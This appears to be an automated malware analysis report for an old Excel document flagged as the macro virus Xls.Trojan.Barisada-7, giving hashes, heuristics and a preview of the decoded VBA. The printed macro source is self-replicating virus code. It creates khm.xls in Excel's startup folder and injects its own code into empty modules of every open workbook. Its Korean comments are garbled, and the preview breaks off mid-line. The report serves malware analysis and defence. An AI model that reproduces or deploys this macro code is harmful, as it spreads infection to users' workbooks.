Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c88576562a5dee2…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-07-02 13:02:33 Authoring application: Microsoft Excel First seen: 2012-10-10
MD5: eac28d901d50f18ffef39536d2848bfc SHA-1: f66b03a32bc0ee12c56e0c282f04de1c172bfbe8 SHA-256: 5c88576562a5dee23970fc05baf78e1d585c52bca73982a1b115ae36bc178a4b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Barisada-7. The VBA macro code attempts to create a new Excel file named 'khm.xls' in the application's startup path, indicating a persistence mechanism. The large slack space in the OLE structure is also anomalous.

Heuristics 2

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 30,720 bytes but its declared streams total only 4,088 bytes — 26,632 bytes (87%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7074 bytes
SHA-256: e3740fafed391648d898e35d9ffe0bd84ad3410d073a3d194daa1c6ac2c85912
Detection
ClamAV: Xls.Trojan.Barisada-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component¿¡ Äڵ尡 ÀÖÀ¸¸é vcodeº¯¼ö¿¡ Äڵ带 ÀúÀå
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'Äڵ尡 ¾ø´Â Component¸¦ ã¾Æ¼­ vcodeº¯¼ö°ªÀ» ÀÔ·Â
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
'ThisWorkbook Component¿¡ Äڵ尡 ÀÖÀ¸¸é vcodeº¯¼ö¿¡ Äڵ带 ÀúÀå
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
'Äڵ尡 ¾ø´Â Component¸¦ ã¾Æ¼­ vcodeº¯¼ö°ªÀ» ÀÔ·Â
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.Sc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.